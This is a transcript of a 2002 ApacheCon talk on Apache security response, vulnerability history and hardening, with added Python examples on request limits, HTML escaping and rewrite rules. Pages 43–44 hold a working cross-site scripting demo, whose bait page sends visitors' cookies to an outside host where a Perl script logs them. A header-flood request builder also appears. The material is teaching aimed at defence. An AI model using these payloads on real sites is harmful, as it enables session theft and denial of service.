Apache Security Secrets: Revealed for ApacheCon …Apache Chunked encoding vulnerability Requests to...

Page 1: Apache Security Secrets: Revealed
ApacheCon 2002, Las Vegas
Mark J Cox
revision 1
www.awe.com/mark/apcon2002

Page 2: Quick Introduction
Who am I?
• Why do you care?
• What is Security Response
Why do we need it?
• Red Hat, Apache, OpenSSL
What will we cover?
What won't we cover?
Tons of extra info in the handout
• also available at www.awe.com/mark/apcon2002/

Page 3: Slapper Worm
Use an example to illustrate some points
Slapper worm found September 2002
Exploited OpenSSL vulnerability
• But through Apache, therefore interesting
Look at the timeline

Page 4: Timeline, July to September 2002
July 19: Vulnerabilities in OpenSSL found in code audit
July 23: CERT contact us with independent verification
July 28: Linux and OpenSSL vendors notified
July 30: OpenSSL updates and announcement
July 30: Vendor updates available
Sept 13: First exploit (as a worm)
Sept 17: Full remote exploit
45 days (July 30 to Sept 13)

Page 5: Commercial or Open Source?
OpenSSL
• Established process
• 0 day "window of known risk"
• Gave time for administrators to upgrade
SSL-C and OpenSSL share common history
• Similar vulnerabilities affected SSL-C
• The timeline is interesting

Page 6: Timeline, August to October 2002
July 30: OpenSSL updates and announcement
July 30: Vendor updates available
Aug 8: RSA announce issue
Aug 22: RSA make fixed libraries available
Sept 10: Covalent 2.0 packages
Sept 13: First exploit (as a worm)
Sept 17: Full remote exploit
Gaps marked on the slide: 23 days; 70+ days

Page 7: Who was vulnerable?
People who didn't update their systems
• Why didn't they upgrade?
Abandoned
Install and Forget
Cry Wolf (too much information)
Incorrect or misleading information
Inertia, too hard to upgrade
They thought they already had
• How can we help?
Better quality information
Easier to upgrade
Everybody thought Somebody would do it.
Anybody could have done it.
But Nobody did.
And in the end Everybody got mad at Somebody
Because... Nobody did what Anybody could have done.

Page 8: Release take up
[Chart: release take-up; no figures survive in the transcript]

Page 9: Secret: Keep your System up to date

Page 10: Security Policy
Why bother?
Security response policy for Apache
• Alert Phase
• Analysis Phase
• Response Phase
• Maintenance Phase
Assumptions
• Just Apache
• Not from a vendor

Page 11: Alert Phase
Where to get your information
• How the quality varies
Keep notes
Apache mailing lists
CERT CC
Bugtraq
Full Disclosure
Apache Week
Apache web site
Security Sites

Page 12: Analysis Phase
What is the issue all about?
How does it affect you
• Impact on your organisation
• Threat assessment
Requires Detective work
Requires trusted information sources
• Chinese Whispers
• Press FUD
MARC

Page 13: Press confusion
Spot mistakes
• "was vulnerable"
• One XSS vulnerability
• Wildcard DNS
• v1.3 wasn't vulnerable
• Matthew didn't patch
• "arbitrary actions"
• didn't bother to ask us
This always happens
• even when they ask us

Page 14: Slapper Press

Page 15: Sans FUD

Page 16: Secret: Security companies have their own agendas
-- MSNBC, 16 Sep 2002

Page 17: Apache and CVE
Lots of vendors ship Apache
Lots of vendors report on Apache issues
• As do the press
• As do weekly journals
Common Vulnerabilities and Exposures
• Mitre
• Dictionary
• Cross-reference with vulnerability databases
• Standardisation and Normalisation

Page 19: Analysis
Things to get (from the advisory)
• Vulnerability name and identifiers
• Versions affected
• Configuration required
• Impact and severity
• Work-around
• Patches

Page 20: Getting to know you
What are you running?
• Nmap
Are you vulnerable?
• Exploits
• Nessus
Dependencies

Page 21: Secret: Go to the source

Page 22: Response Phase
What are you going to do about it
• What is the impact?
• What policies affect it
• Upgrade to the latest version?
• or Phased approach?
• or Patch?
• or do nothing?
But make sure your source isn't a trojan

Page 23: Trojan source
It's happened to OpenSSH and Sendmail
• But not to Apache
Yet

Page 24: Checking the source

Page 25: Security Policy: Maintenance Phase
Steps for recovering from compromise
• LKM rootkits
• Hope you kept a backup

Page 26: Secret: assume you are going to get hacked

Page 27: Secret: Keep Backups

Page 28: Vendor versions
Positives
• Works out of the box
• Customised for the OS
• Tested, QA'd
• The kitchen sink
• One source of security information
• Automatic updates
• Install and forget
• Accountability
Trust
• Trust the vendor's analysis
• Trust the vendor to produce timely critical fixes
Risks
• Mix and match
• Forced to upgrade
• What did they fix

Page 29: Secret: Trust your vendor (if you don't then change vendor!)

Page 30: Backporting
Confuses everyone
It's no longer Apache!
So why do it?
• Customers demand it
• Too many new features
• Certification
• Quicker and painless upgrades
Problems
• Version number doesn't change
Confuses tools
Confuses Nessus
Confuses users
• Vendors have their own package versioning, inconsistent

Page 31: Open source is more secure?
"Many eyes"
• How many of you have audited Apache?
• OpenSSL vulnerabilities "easily spotted"
• There are other benefits
No need for FUD
Apache's history
• Just Apache
• Normalising to CVE

Page 32: Apache 1.3.0 to 1.3.27
Type of issue | Severity | Number of vulnerabilities
Denial of Service | High | 5
Show a directory listing | Low | 4
Read files on the system | High | 3
Remote arbitrary code execution | High | 2
Cross Site Scripting | Medium | 2
Local privilege escalation | Medium | 1
Remote Root Exploit | High | 0

Type of issue | Severity | Who and When
Show the source to CGI scripts | Medium | SuSE Linux, 2000
Show files in /usr/doc | Low | Debian Linux, 1999; SuSE Linux, 2000
Read and write any file in docroot | High | SuSE Linux, 2000
Read .htaccess files | Medium | Cobalt, 2000
Run arbitrary commands remotely | High | IBM, 2000

Page 33: Secret: Apache is already pretty secure

Page 34: Denial of Service
Only interesting if it's easy to do
• Bugs
Directives to help stop regular DoS
• RLimit* LimitRequest*

CVE | Title | Description
CAN-2001-1342 | Denial of service attack on Win32 and OS2 | A client submitting a carefully constructed URI could cause a General Protection Fault in a child process, bringing up a message box which would have to be cleared by the operator to resume.
none | Denial of service attack on Win32 | There have been a number of important security fixes to Apache on Windows. The most important is that there is much better protection against people trying to access special DOS device names (such as "nul").
CAN-1999-1199 | Multiple header Denial of Service vulnerability | A problem exists when a client sends a large number of headers with the same header name. Apache uses up memory faster than the amount of memory required to simply store the received data itself.
none | Denial of service attacks | Apache 1.3.2 has better protection against denial of service attacks.
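The header-flood case above (CAN-1999-1199) and the LimitRequest* directives on the slide are easiest to see with a small request reader that applies the same caps. The following is an added example written for this page, not code from the slides or from Apache's source: the three limit values are Apache's documented defaults, while the request bytes, the header name and the parsing details are constructed for the illustration.

```python
# Added example, not from the slides or the Apache code base: a minimal reader for the
# head of an HTTP/1.x request that enforces caps in the spirit of Apache's
# LimitRequestLine, LimitRequestFieldSize and LimitRequestFields directives, plus a
# constructed "many headers with the same name" request of the kind CAN-1999-1199 describes.

LIMIT_REQUEST_LINE = 8190        # Apache default: max bytes in the request line
LIMIT_REQUEST_FIELD_SIZE = 8190  # Apache default: max bytes in one header line
LIMIT_REQUEST_FIELDS = 100       # Apache default: max number of header lines


class RequestTooLarge(Exception):
    """Raised when a request exceeds one of the limits (Apache answers with a 400-series error)."""


def parse_request_head(raw: bytes):
    """Parse the request line and headers from raw bytes, rejecting oversized input early.

    Returns (request_line, headers); headers is a list of (name, value) tuples that
    keeps duplicates as separate entries instead of merging them into one growing value.
    """
    head, sep, _body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("incomplete request head")
    lines = head.split(b"\r\n")
    request_line = lines[0]
    if len(request_line) > LIMIT_REQUEST_LINE:
        raise RequestTooLarge("request line too long")
    headers = []
    for line in lines[1:]:
        # Check the count before touching the line, so a flood costs at most
        # LIMIT_REQUEST_FIELDS iterations no matter how many lines the client sends.
        if len(headers) >= LIMIT_REQUEST_FIELDS:
            raise RequestTooLarge("too many header fields")
        if len(line) > LIMIT_REQUEST_FIELD_SIZE:
            raise RequestTooLarge("header field too long")
        name, colon, value = line.partition(b":")
        if not colon or not name.strip():
            raise ValueError("malformed header line: %r" % line)
        headers.append((name.strip().lower().decode("latin-1"),
                        value.strip().decode("latin-1")))
    return request_line.decode("latin-1"), headers


def build_header_flood(count: int, name: bytes = b"X-Flood") -> bytes:
    """Constructed attack input: one GET carrying `count` copies of the same header."""
    lines = [b"GET / HTTP/1.0", b"Host: www.example.test"]
    lines += [name + b": " + b"A" * 64 for _ in range(count)]
    return b"\r\n".join(lines) + b"\r\n\r\n"


def is_accepted(raw: bytes) -> bool:
    """True if the request head passes the limits, False if it would be rejected."""
    try:
        parse_request_head(raw)
        return True
    except (RequestTooLarge, ValueError):
        return False


# Constructed benign request used for comparison.
NORMAL_REQUEST = b"GET /index.html HTTP/1.0\r\nHost: www.example.test\r\nAccept: */*\r\n\r\n"

if __name__ == "__main__":
    print("normal request accepted:", is_accepted(NORMAL_REQUEST))
    print("10000-header flood accepted:", is_accepted(build_header_flood(10000)))
```

The LimitRequestFields cap is the configuration-level backstop the slide points at: whatever the client sends, the server stops reading after the hundredth header line, so a flood of repeated headers cannot grow memory beyond a bounded amount per connection.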

Page 35: Get docroot directory listings
Should be a minor impact
• As long as you don't do something silly
Disable mod_autoindex unless you need it

CVE | Title | Description
CAN-2001-0729 | Requests can cause directory listing to be displayed | A vulnerability was found in the Win32 port of Apache 1.3.20. A client submitting a very long URI could cause a directory listing to be returned.
CAN-2001-0731 | Multiviews can cause a directory listing to be displayed | When Multiviews are used to negotiate the directory index, in some configurations requesting a URI with a QUERY_STRING of M=D could return a directory listing.
CAN-2001-0925 | Requests can cause directory listing to be displayed | The default installation can lead mod_negotiation and mod_dir or mod_autoindex to display a directory listing if a very long path was created artificially by using many slashes.
CVE-2000-0505 | Requests can cause directory listing to be displayed on NT | Allows a user to view the listing of a directory instead of the default HTML page by sending a carefully constructed request.

Page 36: Return arbitrary files
It's actually hard to do
• Much easier through a bad CGI or PHP script
• Use a CHROOT jail

CVE | Title | Description
CAN-2000-0913 | Rewrite rules that include references allow access to any file | The Rewrite module, mod_rewrite, can allow access to any file on the web server. The vulnerability occurs only with certain specific cases of using regular expression references in RewriteRule directives.
CAN-2000-1204 | Mass virtual hosting can display CGI source | A security problem for users of the mass virtual hosting module, mod_vhost_alias, causes the source to a CGI to be sent if the cgi-bin directory is under the document root. However, it is not normal to have your cgi-bin directory under a document root.
CAN-2000-1206 | Mass virtual hosting security issue | A security problem can occur for sites using mass name-based virtual hosting (using the new mod_vhost_alias module) or with special mod_rewrite rules.

Page 37: Arbitrary code execution
Nightmare scenario
It's only happened ONCE to Apache 1.3
• and then it was limited to some platforms
• and you didn't get root

CVE | Title | Description
CAN-2002-0392 | Apache Chunked encoding vulnerability | Requests to all versions of Apache 1.3 can cause various effects ranging from a relatively harmless increase in system resources through to denial of service attacks and in some cases the ability to be remotely exploited.
CAN-2002-0061 | Win32 Apache Remote command execution | Apache for Win32 before 1.3.24 and 2.0.34-beta allows remote attackers to execute arbitrary commands via parameters passed to batch file CGI scripts.

Page 38: Mitigate remote exploits
Use a CHROOT jail
"This is the best approach we can currently take against such a monolithic piece of software with such bad behaviours. It is just too big to audit, so for simple usage, we are constraining it to within that jail." -- Theo de Raadt, OpenBSD
[Diagram: host filesystem with usr/, var/, home/, boot/ and www/htdocs/ under /; inside the jail, htdocs/ is seen as /]

Page 39: Local privilege escalation
A unique issue due to a bug
• Local Apache uid can do things as root
Cause a DoS
Kill arbitrary processes
• You can get Apache uid from CGI, Perl etc

CVE | Title | Description
CAN-2002-0839 | Shared memory permissions lead to local privilege escalation | The permissions of the shared memory used for the scoreboard allow an attacker who can execute under the Apache UID to send a signal to any process as root or cause a local denial of service attack.

Page 40: Cross Site Scripting (XSS)
Completely misunderstood
• Let's try an example to show the attack consequences

CVE | Title | Description
CAN-2002-0840 | Error page XSS using wildcard DNS | Cross-site scripting (XSS) vulnerability in the default error page of Apache 2.0 before 2.0.43, and 1.3.x up to 1.3.26, when UseCanonicalName is "Off" and support for wildcard DNS is present, allows remote attackers to execute script as other web page visitors via the Host: header.
CAN-2000-1205 | Cross-site scripting can reveal private session information | Apache was vulnerable to cross-site scripting issues. It was shown that malicious HTML tags can be embedded in client web requests if the server or script handling the request does not carefully encode all information displayed to the user. Using these vulnerabilities attackers could, for example, obtain copies of your private cookies used to authenticate you to other sites.

Page 43: (HTML bait page)
<html><h1>My cute kitten</h1>
<a href="http://www.awe.com/env.cgi?<script>
document.location=
'http://www.moosezone.com/cute.cgi%3F'+document.cookie
</script>">Click here to see my cute kitten</a></html>

Page 44: (Perl CGI, cute.cgi)
#!/usr/bin/perl
print "Content-type: text/html\r\n\r\n";
print "<h1>Awww…</h1><img src=cutekitten.jpg>";
# The victim's cookie arrives as the query string; append it to a log file
open(OUT, ">>/tmp/suckers");
print OUT $ENV{"QUERY_STRING"};
close(OUT);

Page 45: Oops

Page 46: Secret: Understand Cross-site Scripting
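The two slides of attack code show the bait page and the collector, but not env.cgi, the page the bait link points at, which has to echo its query string back into HTML for the script to run at all. The following added example (not code from the slides) stands in for that reflecting CGI in both its vulnerable form and with HTML escaping applied, and sketches in the same way the Host:-header reflection behind CAN-2002-0840; the page layouts, the function names and the hostile hostname are constructed for the illustration, and the attack string is the one from the bait page.

```python
import html

# Added example, not from the slides: the server side of the attack on the previous slides.
# render_env_page is an assumed stand-in for env.cgi (a CGI that echoes QUERY_STRING);
# render_error_page is an illustration of the CAN-2002-0840 shape, not Apache's error-page code.

# Attack string from the slide's bait page (the part after "env.cgi?").
ATTACK_QUERY = (
    "<script>document.location="
    "'http://www.moosezone.com/cute.cgi%3F'+document.cookie</script>"
)


def render_env_page(query_string: str, escape: bool = True) -> str:
    """Page body for a CGI that displays its QUERY_STRING.

    With escape=False the raw string is written into the HTML, which is the
    vulnerable behaviour; with escape=True every <, >, &, " and ' is encoded, so the
    browser shows the text instead of executing it.
    """
    shown = html.escape(query_string, quote=True) if escape else query_string
    return ("<html><body><h1>Environment</h1><pre>QUERY_STRING="
            + shown + "</pre></body></html>")


def render_error_page(host_header: str, escape: bool = True) -> str:
    """Self-referencing 404 page whose hostname is taken from the request's Host: header.

    With wildcard DNS any hostname the attacker chooses resolves to the server, so the
    Host: value is attacker-controlled text and needs the same escaping.
    """
    shown = html.escape(host_header, quote=True) if escape else host_header
    return ("<html><body><h1>Not Found</h1>"
            "<p>The requested URL was not found on this server.</p>"
            "<hr><address>Server at " + shown + " Port 80</address></body></html>")


def contains_live_script(page: str) -> bool:
    """True if the page still carries an executable <script> element."""
    return "<script>" in page.lower()


# Constructed hostile Host: header value for the error-page case.
EVIL_HOST = "www.example.test<script>alert(document.cookie)</script>"

if __name__ == "__main__":
    print("reflecting CGI, unescaped:", contains_live_script(render_env_page(ATTACK_QUERY, escape=False)))
    print("reflecting CGI, escaped:  ", contains_live_script(render_env_page(ATTACK_QUERY)))
    print("error page, unescaped:    ", contains_live_script(render_error_page(EVIL_HOST, escape=False)))
    print("error page, escaped:      ", contains_live_script(render_error_page(EVIL_HOST)))
```

Escaping at the point where attacker-controlled text is written into HTML is the whole fix for the reflecting CGI. For the error-page case the CVE text gives the configuration side as well: the issue needs UseCanonicalName Off, so with it On the server builds the self-referencing URL from its configured ServerName and the attacker's Host: value never reaches the page.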

Page 47: mod_rewrite canonicalisation
CVE-2001-1072, August 2001
Pass // to most rewrite rules
Including ones in our own documentation
Wrong!  RewriteRule ^/somepath(.*) /otherpath$1 [R]
Right   RewriteRule ^/+somepath(.*) /otherpath$1 [R]
http://www.awe.com/somepath/fred
http://www.awe.com//somepath/fred
...This isn't fixed!!!
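To see why the first rule is wrong, run both patterns against both URLs from the slide. This is an added example for this page, not code from the slides or from mod_rewrite: Python's re module stands in for mod_rewrite's regex matching, the redirect target is simplified to a path, and the DocumentRoot value /www/htdocs is an assumption. The slash-collapsing step reflects what Apache does when it maps a URI onto the filesystem (runs of slashes are reduced to one), which is what lets //somepath/fred reach the original file once the rule fails to match.

```python
import re

# Added example, not from the slides or mod_rewrite: the two RewriteRule patterns from
# the slide applied to the two request URIs from the slide.

WRONG_RULE = re.compile(r"^/somepath(.*)")   # RewriteRule ^/somepath(.*)  /otherpath$1 [R]
RIGHT_RULE = re.compile(r"^/+somepath(.*)")  # RewriteRule ^/+somepath(.*) /otherpath$1 [R]
DOCUMENT_ROOT = "/www/htdocs"  # assumed DocumentRoot for the illustration


def redirect_target(rule, request_uri):
    """Emulate one RewriteRule with [R]: the redirect path if the pattern matches, else None."""
    m = rule.match(request_uri)
    if m is None:
        return None
    return "/otherpath" + m.group(1)


def filesystem_path(request_uri):
    """Where the request lands when no rule fires.

    Apache collapses runs of slashes when mapping a URI onto DocumentRoot, so
    //somepath/fred and /somepath/fred name the same file on disk.
    """
    return DOCUMENT_ROOT + re.sub(r"/+", "/", request_uri)


def dispatch(rule, request_uri):
    """Return ('redirect', path) or ('file', path) for a request under the given rule."""
    target = redirect_target(rule, request_uri)
    if target is not None:
        return ("redirect", target)
    return ("file", filesystem_path(request_uri))


# The two URIs from the slide.
CANONICAL_URI = "/somepath/fred"
DOUBLE_SLASH_URI = "//somepath/fred"

if __name__ == "__main__":
    for label, rule in (("wrong", WRONG_RULE), ("right", RIGHT_RULE)):
        for uri in (CANONICAL_URI, DOUBLE_SLASH_URI):
            print(label, uri, "->", dispatch(rule, uri))
```

The same anchoring mistake matters more when the rule is there to deny access (a RewriteRule ending in [F]) rather than to redirect: a request for //somepath skips the rule in exactly the same way, and the file is served instead of forbidden.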

Page 48: Attacks and Exploits
Who exploits Apache?
What sort of attacks
• Targeted
• Automated
Worms
Worm makeup
• Exploit portion
• Scanner portion
• Payload portion

Page 49: Apache Worms
Name | Date | Affects | Exploits
Slapper (Linux.Slapper-A, Linux.Slapper-Worm, Apache/mod_ssl Worm) | 13 Sept 2002 | Apache with mod_ssl and OpenSSL on various Linux platforms | CAN-2002-0656
Linux.Devnull | 30 Sept 2002 | Apache with mod_ssl and OpenSSL on various Linux platforms | CAN-2002-0656
Scalper (Ehchapa, PHP/Exploit-Apache) | 28 June 2002 | Apache on OpenBSD and FreeBSD | CAN-2002-0392

Page 50: Secrets, finally revealed
Don't Panic
Make a security policy for dealing with Apache emergencies
Mitigate the risks
Review the secrets

Page 51: Secret: If this is too much effort, turn off your server
"The only truly secure system is one that is powered off, cast in a block of concrete and sealed in a lead-lined room with armed guards -- and even then I have my doubts." -- Gene Spafford